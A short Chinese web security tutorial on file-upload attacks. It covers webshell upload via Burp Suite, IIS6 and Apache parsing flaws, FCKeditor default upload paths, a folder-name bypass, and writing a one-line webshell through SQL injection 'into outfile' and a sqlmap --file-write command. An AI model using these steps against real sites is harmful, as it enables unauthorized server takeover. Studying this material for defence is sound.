WEB安全——文件上传
通過burpsuite抓包上傳webshell
先上傳正常圖片;
通過抓包獲得上傳頁面的url以及cookie;
通過明小子的綜合上傳功能上傳webshell;
?
IIS解析漏洞:
1.如果一個(gè)目錄以“xxx.asp”的形式命名,那么該目錄下的所有類型的文件都會(huì)被當(dāng)作asp文件來進(jìn)行解析;
2.如果一個(gè)文件的擴(kuò)展名采用“.asp;*.jpg"的形式,那么該文件也會(huì)被當(dāng)作asp文件解析執(zhí)行;
一般在IIS6.0才存在,一個(gè)沒有補(bǔ)丁的漏洞;
apache解析漏洞:
在解析文件時(shí),當(dāng)碰到不認(rèn)識(shí)的擴(kuò)展名時(shí),將會(huì)從后往前解析,知道碰到認(rèn)識(shí)的擴(kuò)展名;
如,teset.php.xx
在apache1.1和1.2存在,nginx也存在該漏洞;
?
編輯器漏洞:FCKeditor(Ewebeditor)
通過搜索引擎等方式獲知網(wǎng)站是否使用FCKeditor;
獲取或猜測FCKeditor的安裝目錄;
利用IIS6解析漏洞上傳一句話木馬或webshell;
?
FCKeditor敏感信息:
查看版本信息:
/FCKEditor/editor/dialog/fck_about.html
/FCKeditor/_whatsnew.html
默認(rèn)上傳頁面:
/FCKEditor/editor/filemanager/browser/default/browser.html
/FCKEditor/editor/filemanager/browser/default/connectors/test.html
/FCKEditor/editor/filemanager/browser/upload/test.html
/FCKEditor/editor/filemanager/browser/connectors/test.html
/FCKEditor/editor/filemanager/browser/connectors/uploadtest.html
?
利用文件夾名解析漏洞嘗試?yán)@過:
正常創(chuàng)建文件夾1.asp,也被替換為1_asp
修改父目錄的名字,在burpsuite中,將CurrentFolder=%2F修改為CurrentFolder=%2F1.asp
%2F使用ASCII碼形式表示字符“/”
?
通過SQL語句注入實(shí)現(xiàn)文件上傳
手工注入:
select “test1" into outfile "D:/AppServe/www/test1.txt"
select * from hack union select 1, "一句話木馬", 3 into outfile "D:/AppServe/www/test1.txt"
sqlmap注入:
先將一句話木馬存放到本地文件d:\ma.php中
獲取到目標(biāo)網(wǎng)站的物理路徑C:\NPMserv\www
--file-write參數(shù)指定本地文件路徑
--file-dest參數(shù)指定目標(biāo)路徑
sqlmap.py -u "http://192.168.77.122/info_show.php?info_id=140"--file-write “d:/ma.php” --file-dest “C:/NPMserv/www/ma.php”
前提:
數(shù)據(jù)庫是MySQL或MSSQL
當(dāng)前用戶必須具有數(shù)據(jù)庫管理員權(quán)限
知道目標(biāo)網(wǎng)站的物理路徑
?
?
?
總結(jié)
以上是生活随笔為你收集整理的WEB安全——文件上传的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: vpp之feature机制介绍
- 下一篇: 网络安全课第三节 SQL 注入的检测与防